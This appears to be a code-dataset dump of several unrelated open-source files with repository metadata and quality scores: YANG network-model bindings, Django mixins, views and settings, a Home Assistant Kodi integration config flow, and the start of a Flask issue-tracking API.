['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False) Getter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32) YANG Description: tot_no_of_prefix_fec_filtered Setter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_tot_no_of_prefix_fec_filtered is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_tot_no_of_prefix_fec_filtered() directly. YANG Description: tot_no_of_prefix_fec_filtered tot_no_of_prefix_fec_filtered must be of a type compatible with uint32 YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False) Getter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32) YANG Description: tot_no_of_prefix_fec_lwd Setter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_tot_no_of_prefix_fec_lwd is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_tot_no_of_prefix_fec_lwd() directly. YANG Description: tot_no_of_prefix_fec_lwd tot_no_of_prefix_fec_lwd must be of a type compatible with uint32 YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False) Getter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type) YANG Description: Filter Type Setter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type) If this variable is read-only (config: false) in the source YANG file, then _set_filtered is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_filtered() directly. YANG Description: Filter Type filtered must be of a type compatible with fec-filter-type YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False) Getter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string) YANG Description: filter name Setter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string) If this variable is read-only (config: false) in the source YANG file, then _set_prefix_filtered is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_prefix_filtered() directly. YANG Description: filter name prefix_filtered must be of a type compatible with string YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False) Getter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list) Setter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list) If this variable is read-only (config: false) in the source YANG file, then _set_prefix is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_prefix() directly. prefix must be of a type compatible with list YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False) Getter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container) Setter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container) If this variable is read-only (config: false) in the source YANG file, then _set_key is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_key() directly. key must be of a type compatible with container YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False) | 1.847884 | 2 |
pug/dj/miner/model_mixin.py | hobson/pug-dj | 0 | 10316 | from pug.nlp.db import representation
from django.db import models
class RepresentationMixin(models.Model):
"""Produce a meaningful string representation of a model with `str(model.objects.all[0])`."""
__unicode__ = representation
class Meta:
abstract = True
class DateMixin(models.Model):
"""Add updated and created fields that auto-populate to create a ORM-level transaction log for auditing (though not a full log, just 2 events)."""
updated = models.DateTimeField(auto_now=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
abstract = True
| from pug.nlp.db import representation
from django.db import models
class RepresentationMixin(models.Model):
"""Produce a meaningful string representation of a model with `str(model.objects.all[0])`."""
__unicode__ = representation
class Meta:
abstract = True
class DateMixin(models.Model):
"""Add updated and created fields that auto-populate to create a ORM-level transaction log for auditing (though not a full log, just 2 events)."""
updated = models.DateTimeField(auto_now=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
abstract = True
| en | 0.792242 | Produce a meaningful string representation of a model with `str(model.objects.all[0])`. Add updated and created fields that auto-populate to create a ORM-level transaction log for auditing (though not a full log, just 2 events). | 2.568376 | 3 |
custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 5 | 10317 | <reponame>JurajNyiri/kodi-media-sensors
import logging
from typing import Any, Dict, Optional
from homeassistant import config_entries
from homeassistant.components.kodi.const import DOMAIN as KODI_DOMAIN
from homeassistant.core import callback
import voluptuous as vol
from .const import (
OPTION_HIDE_WATCHED,
OPTION_USE_AUTH_URL,
OPTION_SEARCH_LIMIT,
OPTION_SEARCH_LIMIT_DEFAULT_VALUE,
CONF_KODI_INSTANCE,
DOMAIN,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW,
CONF_SENSOR_RECENTLY_ADDED_MOVIE,
CONF_SENSOR_PLAYLIST,
CONF_SENSOR_SEARCH,
)
_LOGGER = logging.getLogger(__name__)
class KodiMediaSensorsConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Kodi Media Sensors config flow."""
async def async_step_user(self, user_input: Optional[Dict[str, Any]]):
"""Handle a flow initialized via the user interface."""
# Find all configured kodi instances to allow the user to select one.
kodi_instances: Dict[str, str] = {
entry.entry_id: entry.title
for entry in self.hass.config_entries.async_entries(KODI_DOMAIN)
if entry.source != "ignore"
}
data_schema = vol.Schema(
{
vol.Required(CONF_KODI_INSTANCE): vol.In(list(kodi_instances.values())),
vol.Optional(CONF_SENSOR_RECENTLY_ADDED_TVSHOW, default=False): bool,
vol.Optional(CONF_SENSOR_RECENTLY_ADDED_MOVIE, default=False): bool,
vol.Optional(CONF_SENSOR_PLAYLIST, default=False): bool,
vol.Optional(CONF_SENSOR_SEARCH, default=False): bool,
}
)
errors = {}
if not kodi_instances:
errors["base"] = "kodi_not_configured"
if user_input is not None:
config_entry_id: Optional[str] = None
for entry_id, title in kodi_instances.items():
if title == user_input[CONF_KODI_INSTANCE]:
config_entry_id = entry_id
break
if config_entry_id is None:
errors["base"] = "kodi_not_configured"
if not errors:
return self.async_create_entry(
title="Kodi Media Sensors",
data={
CONF_KODI_INSTANCE: config_entry_id,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW: user_input[
CONF_SENSOR_RECENTLY_ADDED_TVSHOW
],
CONF_SENSOR_RECENTLY_ADDED_MOVIE: user_input[
CONF_SENSOR_RECENTLY_ADDED_MOVIE
],
CONF_SENSOR_PLAYLIST: user_input[CONF_SENSOR_PLAYLIST],
CONF_SENSOR_SEARCH: user_input[CONF_SENSOR_SEARCH],
},
)
return self.async_show_form(
step_id="user",
data_schema=data_schema,
errors=errors,
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Handles options flow for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
hide_watched = self.config_entry.options.get(OPTION_HIDE_WATCHED, False)
use_auth_url = self.config_entry.options.get(OPTION_USE_AUTH_URL, False)
search_limit = self.config_entry.options.get(
OPTION_SEARCH_LIMIT, OPTION_SEARCH_LIMIT_DEFAULT_VALUE
)
options_schema = vol.Schema(
{
vol.Optional(OPTION_HIDE_WATCHED, default=hide_watched): bool,
vol.Optional(OPTION_USE_AUTH_URL, default=use_auth_url): bool,
vol.Optional(OPTION_SEARCH_LIMIT, default=search_limit): int,
}
)
return self.async_show_form(
step_id="init",
data_schema=options_schema,
)
| import logging
from typing import Any, Dict, Optional
from homeassistant import config_entries
from homeassistant.components.kodi.const import DOMAIN as KODI_DOMAIN
from homeassistant.core import callback
import voluptuous as vol
from .const import (
OPTION_HIDE_WATCHED,
OPTION_USE_AUTH_URL,
OPTION_SEARCH_LIMIT,
OPTION_SEARCH_LIMIT_DEFAULT_VALUE,
CONF_KODI_INSTANCE,
DOMAIN,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW,
CONF_SENSOR_RECENTLY_ADDED_MOVIE,
CONF_SENSOR_PLAYLIST,
CONF_SENSOR_SEARCH,
)
_LOGGER = logging.getLogger(__name__)
class KodiMediaSensorsConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Kodi Media Sensors config flow."""
async def async_step_user(self, user_input: Optional[Dict[str, Any]]):
"""Handle a flow initialized via the user interface."""
# Find all configured kodi instances to allow the user to select one.
kodi_instances: Dict[str, str] = {
entry.entry_id: entry.title
for entry in self.hass.config_entries.async_entries(KODI_DOMAIN)
if entry.source != "ignore"
}
data_schema = vol.Schema(
{
vol.Required(CONF_KODI_INSTANCE): vol.In(list(kodi_instances.values())),
vol.Optional(CONF_SENSOR_RECENTLY_ADDED_TVSHOW, default=False): bool,
vol.Optional(CONF_SENSOR_RECENTLY_ADDED_MOVIE, default=False): bool,
vol.Optional(CONF_SENSOR_PLAYLIST, default=False): bool,
vol.Optional(CONF_SENSOR_SEARCH, default=False): bool,
}
)
errors = {}
if not kodi_instances:
errors["base"] = "kodi_not_configured"
if user_input is not None:
config_entry_id: Optional[str] = None
for entry_id, title in kodi_instances.items():
if title == user_input[CONF_KODI_INSTANCE]:
config_entry_id = entry_id
break
if config_entry_id is None:
errors["base"] = "kodi_not_configured"
if not errors:
return self.async_create_entry(
title="Kodi Media Sensors",
data={
CONF_KODI_INSTANCE: config_entry_id,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW: user_input[
CONF_SENSOR_RECENTLY_ADDED_TVSHOW
],
CONF_SENSOR_RECENTLY_ADDED_MOVIE: user_input[
CONF_SENSOR_RECENTLY_ADDED_MOVIE
],
CONF_SENSOR_PLAYLIST: user_input[CONF_SENSOR_PLAYLIST],
CONF_SENSOR_SEARCH: user_input[CONF_SENSOR_SEARCH],
},
)
return self.async_show_form(
step_id="user",
data_schema=data_schema,
errors=errors,
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Handles options flow for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
hide_watched = self.config_entry.options.get(OPTION_HIDE_WATCHED, False)
use_auth_url = self.config_entry.options.get(OPTION_USE_AUTH_URL, False)
search_limit = self.config_entry.options.get(
OPTION_SEARCH_LIMIT, OPTION_SEARCH_LIMIT_DEFAULT_VALUE
)
options_schema = vol.Schema(
{
vol.Optional(OPTION_HIDE_WATCHED, default=hide_watched): bool,
vol.Optional(OPTION_USE_AUTH_URL, default=use_auth_url): bool,
vol.Optional(OPTION_SEARCH_LIMIT, default=search_limit): int,
}
)
return self.async_show_form(
step_id="init",
data_schema=options_schema,
) | en | 0.752426 | Kodi Media Sensors config flow. Handle a flow initialized via the user interface. # Find all configured kodi instances to allow the user to select one. Get the options flow for this handler. Handles options flow for the component. Manage the options. | 2.100883 | 2 |
MySite/MainApp/views.py | tananyan/siteee | 1 | 10318 | from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# Опять же, спасибо django за готовую форму аутентификации.
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
class index(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/homepage.html"
# В случае успеха перенаправим на главную.
success_url = "/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/homepage.html',
{'form': form1, 'user': request.user})
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(index, self).form_valid(form)
class contact(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/contact.html"
# В случае успеха перенаправим на главную.
success_url = "../contact/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/contact.html',
{'values': ['Звоните по телефону', '<EMAIL>', '8(977)335-77-77'], 'form': form1, 'user': request.user})
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(contact, self).form_valid(form)
class registration(FormView):
form_class = forms.UserCreationForm
# Ссылка, на которую будет перенаправляться пользователь в случае успешной регистрации.
# В данном случае указана ссылка на страницу входа для зарегистрированных пользователей.
success_url = "/login/"
# Шаблон, который будет использоваться при отображении представления.
template_name = "MainApp/registration_form.html"
def form_valid(self, form):
# Создаём пользователя, если данные в форму были введены корректно.
form.save()
# Вызываем метод базового класса
return super(registration, self).form_valid(form)
class LogoutView(View):
def get(self, request):
# Выполняем выход для пользователя, запросившего данное представление.
logout(request)
# После чего, перенаправляем пользователя на главную страницу.
#return HttpResponseRedirect("/seeuagain")
return render(request, 'MainApp/quitpage.html')
class LoginFormView(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/login_form.html"
# В случае успеха перенаправим на главную.
success_url = "/news"
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(LoginFormView, self).form_valid(form)
| from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# Опять же, спасибо django за готовую форму аутентификации.
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
class index(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/homepage.html"
# В случае успеха перенаправим на главную.
success_url = "/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/homepage.html',
{'form': form1, 'user': request.user})
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(index, self).form_valid(form)
class contact(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/contact.html"
# В случае успеха перенаправим на главную.
success_url = "../contact/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/contact.html',
{'values': ['Звоните по телефону', '<EMAIL>', '8(977)335-77-77'], 'form': form1, 'user': request.user})
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(contact, self).form_valid(form)
class registration(FormView):
form_class = forms.UserCreationForm
# Ссылка, на которую будет перенаправляться пользователь в случае успешной регистрации.
# В данном случае указана ссылка на страницу входа для зарегистрированных пользователей.
success_url = "/login/"
# Шаблон, который будет использоваться при отображении представления.
template_name = "MainApp/registration_form.html"
def form_valid(self, form):
# Создаём пользователя, если данные в форму были введены корректно.
form.save()
# Вызываем метод базового класса
return super(registration, self).form_valid(form)
class LogoutView(View):
def get(self, request):
# Выполняем выход для пользователя, запросившего данное представление.
logout(request)
# После чего, перенаправляем пользователя на главную страницу.
#return HttpResponseRedirect("/seeuagain")
return render(request, 'MainApp/quitpage.html')
class LoginFormView(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/login_form.html"
# В случае успеха перенаправим на главную.
success_url = "/news"
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(LoginFormView, self).form_valid(form)
| ru | 0.99303 | # Опять же, спасибо django за готовую форму аутентификации. # Аналогично регистрации, только используем шаблон аутентификации. # В случае успеха перенаправим на главную. # Получаем объект пользователя на основе введённых в форму данных. # Выполняем аутентификацию пользователя. # Аналогично регистрации, только используем шаблон аутентификации. # В случае успеха перенаправим на главную. # Получаем объект пользователя на основе введённых в форму данных. # Выполняем аутентификацию пользователя. # Ссылка, на которую будет перенаправляться пользователь в случае успешной регистрации. # В данном случае указана ссылка на страницу входа для зарегистрированных пользователей. # Шаблон, который будет использоваться при отображении представления. # Создаём пользователя, если данные в форму были введены корректно. # Вызываем метод базового класса # Выполняем выход для пользователя, запросившего данное представление. # После чего, перенаправляем пользователя на главную страницу. #return HttpResponseRedirect("/seeuagain") # Аналогично регистрации, только используем шаблон аутентификации. # В случае успеха перенаправим на главную. # Получаем объект пользователя на основе введённых в форму данных. # Выполняем аутентификацию пользователя. | 2.143732 | 2 |
imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 1 | 10319 | """
Django settings for imagetagger project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
from django.contrib.messages import constants as messages
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'imagetagger.annotations',
'imagetagger.base',
'imagetagger.images',
'imagetagger.users',
'imagetagger.tools',
'imagetagger.administration',
'django.contrib.admin',
'imagetagger.tagger_messages',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'widget_tweaks',
'friendlytagloader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'imagetagger.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'imagetagger.base.context_processors.base_data',
],
},
},
]
WSGI_APPLICATION = 'imagetagger.wsgi.application'
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'users.User'
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin' # Timezone of your server
USE_I18N = True
USE_L10N = True
USE_TZ = True
PROBLEMS_URL = 'https://github.com/bit-bots/imagetagger/issues'
PROBLEMS_TEXT = ''
LOGIN_URL = '/user/login/'
LOGIN_REDIRECT_URL = '/images/'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
MESSAGE_TAGS = {
messages.INFO: 'info',
messages.ERROR: 'danger',
messages.WARNING: 'warning',
messages.SUCCESS: 'success',
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
EXPORT_SEPARATOR = '|'
DATA_PATH = os.path.join(BASE_DIR, 'data')
IMAGE_PATH = os.path.join(BASE_DIR, 'images') # the absolute path to the folder with the imagesets
# filename extension of accepted imagefiles
IMAGE_EXTENSION = {
'png',
'jpeg',
}
# Sets the default expire time for new messages in days
DEFAULT_EXPIRE_TIME = 7
# Sets the default number of messages per page
MESSAGES_PER_PAGE = 10
| """
Django settings for imagetagger project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
from django.contrib.messages import constants as messages
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'imagetagger.annotations',
'imagetagger.base',
'imagetagger.images',
'imagetagger.users',
'imagetagger.tools',
'imagetagger.administration',
'django.contrib.admin',
'imagetagger.tagger_messages',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'widget_tweaks',
'friendlytagloader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'imagetagger.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'imagetagger.base.context_processors.base_data',
],
},
},
]
WSGI_APPLICATION = 'imagetagger.wsgi.application'
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'users.User'
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin' # Timezone of your server
USE_I18N = True
USE_L10N = True
USE_TZ = True
PROBLEMS_URL = 'https://github.com/bit-bots/imagetagger/issues'
PROBLEMS_TEXT = ''
LOGIN_URL = '/user/login/'
LOGIN_REDIRECT_URL = '/images/'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
MESSAGE_TAGS = {
messages.INFO: 'info',
messages.ERROR: 'danger',
messages.WARNING: 'warning',
messages.SUCCESS: 'success',
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
EXPORT_SEPARATOR = '|'
DATA_PATH = os.path.join(BASE_DIR, 'data')
IMAGE_PATH = os.path.join(BASE_DIR, 'images') # the absolute path to the folder with the imagesets
# filename extension of accepted imagefiles
IMAGE_EXTENSION = {
'png',
'jpeg',
}
# Sets the default expire time for new messages in days
DEFAULT_EXPIRE_TIME = 7
# Sets the default number of messages per page
MESSAGES_PER_PAGE = 10
| en | 0.637708 | Django settings for imagetagger project. Generated by 'django-admin startproject' using Django 1.10.3. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) # SECURITY WARNING: don't run with debug turned on in production! # Application definition # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ # Timezone of your server # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ # the absolute path to the folder with the imagesets # filename extension of accepted imagefiles # Sets the default expire time for new messages in days # Sets the default number of messages per page | 1.82748 | 2 |
apps/project/views/issue.py | rainydaygit/testtcloudserver | 349 | 10320 | <reponame>rainydaygit/testtcloudserver
from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# 新增issue
@issue.route('/', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_create')
def issue_add_handler():
"""
@api {post} /v1/issue 新增 缺陷
@apiName CreateIssue
@apiGroup 项目
@apiDescription 新增 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 123,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, creator, modifier, handler,
issue_type, chance, level, priority, stage,title, attach, handle_status,
description, comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_create')
ret = IssueBusiness.create(system, version, project_id, module_id, creator, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_modify')
def issue_modify_handler(issue_id):
"""
@api {post} /v1/issue/{int:id} 修改 缺陷
@apiName ModifyIssue
@apiGroup 项目
@apiDescription 修改 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
